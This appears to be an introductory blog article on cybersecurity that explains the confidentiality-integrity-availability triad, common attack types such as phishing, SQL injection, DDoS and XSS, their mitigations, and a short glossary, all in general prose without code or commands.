A Big Picture Introduction to Cybersecurity
Learn about cybersecurity, why it is important and how to remain secure online.
We live in an interconnected world today where a lot of people have access to the internet. Our lives and livelihoods are increasingly dependent on technology. However, some online activities involve sending our data as such if not done safely, can be vulnerable to attack if proper security measures are not taken. This is why cybersecurity is important.
Cybersecurity is the practice of defending internet activities, devices, servers, applications and online data from the threat of attack. Proper security measures will protect us from unauthorised access to our devices and applications, protect our data from tampering and theft, and ensure the integrity of data and other online services are maintained.
Essentially cybersecurity is about ensuring the following:
Ensuring attackers don't have unauthorized access to confidential information or data.
Ensuring attackers cannot modify or delete the data.
Ensuring attackers do not overwhelm a system.
Cybersecurity Triad (C.I.A)
There are three important aspects of any secure system. They include:
C - Confidentiality: Confidentiality deals with the aspect of protecting data from being viewed by authorized parties. In other words, this ensures the privacy of data.
I - Integrity: Integrity means that data cannot be changed or deleted by any unauthorized party.
A - Availability: Availability is the ability of data to be accessible at all times without delay.
To understand how to take proper security measures, we will be exploring different forms of cyber attacks and how to mitigate against them.
Different types of cyber attacks
Phishing Attack 🎣
Phishing attacks are one of the most common forms of cybersecurity threats. This is when an attacker tries to trick a victim into giving them your private/sensitive information, like their passwords or credit card numbers.
This happens when an attack sends them a message mimicking a company/brand usually through an email or text message with a link to a fake website that looks almost like the real website. The website usually has a form asking visitors to input sensitive data like credit card information, passwords, or wallet secret keys. If the victim falls for the trick and enters their private data, their data is stored in the attacker’s computer and the site responds with a redundant message. The attacker can then use that data to gain access to their private accounts, drain personal funds or impersonate the victim.
Phishing attacks are common, but you can prevent them by verifying the legitimacy of messages received from any organisation. Also, verify the URL of websites you visit to ensure they are authentic. For example, an attacker can use a fake URL like support.good-bank.cr.com whereas the real website is support.goodbank.com.
Malware 🕷️
Malware is an invasive software which once downloaded into a device or server can perform malicious attacks on the system.
There are different types of malware:
Viruses: This is the most common type of malware. The nature of viruses is that they can spread from device to device through a network or storage device. Viruses usually accomplish a variety of exploits, from less severe ones like slowing down a device/server to more severe ones that delete files from the system.
Worms: This is a malicious software that is capable of replicating itself without human intervention. They usually spread across a network like a Local Area Network (LAN) or an organisation’s private network.
Trojan horse: This malware is used to execute attacks on a device/server from a remote location.
Ransomware: This is the most severe form of malware. This malware encrypts or moves the information of a device/server so that it is inaccessible to the user. The attacker usually requests a ransom to be paid to them to recover the encrypted or stolen data. A popular example of ransomware is Wanacry which spread rapidly across the globe in 2017, encrypting data on Windows PCs and demanding ransom payments in Bitcoin for decryption.
You can protect yourself from malware using up-to-date software, proper antivirus software, not interfacing with infected computers, and not downloading software indiscriminately online.
SQL injection 💉
This is when raw SQL commands are inputted directly into an application to perform malicious actions on an organisation’s database. SQL (Structured Query Language) perform actions known as queries on relational databases. An attacker can use SQL injection to steal data from the database, falsify database tables or even delete all the organisation’s data.
Yahoo is a famous company that came under an SQL injection attack. In 2012, an SQL injection attack on Yahoo’s website exposed usernames and passwords of around 450,000 accounts.
SQL injection can be prevented by sanitizing incoming strings that will passed into the database, using robust ORMs that check for these attacks and using row-level security to avoid authorised queries on a database.
Brute force attack 🔨
This is when an attacker systematically tries every possible password combination to gain unauthorized access to a system or account, exploiting weak or common passwords to break into secure areas.
Brute force attacks can be prevented by using stronger passwords and enabling multi-factor authentication on applications you use. Companies can also protect their users from getting hacked by using rate-limiting, bot prevention mechanisms like Captcha, and offering alternative means of authentication like OTPs, magic links and passkeys.
Distributed Denial of Service (DDoS) attack 💥
DDoS happens when a server or application is intentionally overloaded with too much traffic from multiple devices. When this happens, it can cause the application to slow down, stop responding, increase hosting costs or even break down the servers.
A popular DDoS attack is the 2016 Dyn attack, where a massive botnet overwhelmed the DNS provider Dyn, causing widespread outages and disrupting major websites like Twitter, Netflix, and Reddit.
DDoS attacks can be prevented by using Content Delivery Networks (CDNs) e.g. Cloudflare to handle traffic to your site, setting up firewalls, rate-limiting, adding traffic caps, and using redundant backup servers in case of an incident.
Cross-Site Scripting (XSS) 📜
This is when an attacker injects malicious scripts into a website. The script can be executed to steal the user session data (cookies or tokens) and carry out actions on behalf of the user.
XSS attacks can be prevented while creating websites by using HTTP-only and secure cookies, avoiding inline Javascript, using frameworks that sanitise HTML codes and using a secure web framework.
Man-in-the-middle attack (MITM) 👨🏻💻
A Man-in-the-Middle (MITM) attack happens when an attacker secretly intercepts and potentially alters the two services. This means the attacker can intercept a message from the sender, and steal or alter it before it is sent to the receiver.
The most popular way to mitigate MITM attacks is by using encryption. The first form of encryption is using HTTPS over HTTP, this ensures that all requests made online by users are secure. However, some MITM attacks cannot be prevented by HTTPS, you can protest against them by using VPNs to tunnel information, private key encryption and using intrusion detection systems (IDS).
Social Engineering 🧠
This happens when an attacker pretends to be a trusted authority to deceive a victim into divulging confidential information or performing actions that compromise security. A popular example of social engineering attacks is scam calls.
Common Terms Used in Cybersecurity
Rainbow tables: Rainbow tables are pre-computed databases used to quickly crack hashed passwords by matching them with pre-hashed values.
Zero-day vulnerability: A zero-day vulnerability is a security flaw in software that is unknown to the vendor and yet to be fixed, making it susceptible to attacks at any time.
Zero-day exploit: A zero-day exploit is an attack that targets the vulnerable parts of software that are yet to be detected by the vendor.
Black hats and White hats: Black hats are hackers who exploit vulnerable parts of software for malicious purposes. White hats are hackers who detect vulnerabilities in software and inform the vendor about them.
Encryption: Encryption is the process of converting information into a coded format that only authorized parties can read, ensuring that the data remains private and secure from unauthorized access.
Backdoor: A backdoor is a hidden method or vulnerability in a software or system that allows unauthorized access to the data or functionalities, bypassing normal security measures.’
Penetration testing: Penetration testing, or pen testing, is a simulated cyberattack on a computer system, network, or application to identify and exploit vulnerabilities, helping to improve security.
Why Cybersecurity is important
Cybersecurity is essential to protect sensitive information and maintain the integrity of online interactions. It safeguards against cyber threats that can compromise personal data, financial information, and critical infrastructure. As cyber threats evolve, the demand for skilled cybersecurity professionals grows as companies search for more ways to secure their infrastructure.